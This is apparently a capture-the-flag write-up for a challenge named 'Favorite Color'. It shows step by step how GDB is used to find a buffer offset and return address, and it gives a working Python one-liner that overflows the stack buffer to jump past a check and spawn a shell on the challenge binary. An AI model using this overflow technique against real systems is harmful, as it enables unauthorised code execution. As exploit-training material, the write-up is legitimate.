Skip to content

Favorite Color

  1. Check the source code. Clearly no input can make good true. Let's make the program skip the check.
  2. GDB -> disas main -> instruction after the jump je: 0x08048657
  3. b *vuln+34, run, enter a long string of a's
  4. On hitting the breakpoint:
    • i f -> ebp is at 0xff89d8f8
    • x/100xg $ebp-200 -> input buffer starts at 0xff89d8c8 = ebp-0x30 = ebp-48
    • return address is stored at ebp+4

  5. Enter 52 bytes of gibberish and then desired return address (take care of endianness):

    shell (python -c "print('a'*52 + '\x57\x86\x04\x08')"; cat) | ./color

The above spawns shell successfully, executing cat flag.txt should give the flag. If you encounter an error "Cannot fork", just kill all the "/bin/sh" processes: ps aux | awk '$11 == "/bin/sh" {print $2}', and then run the exploit again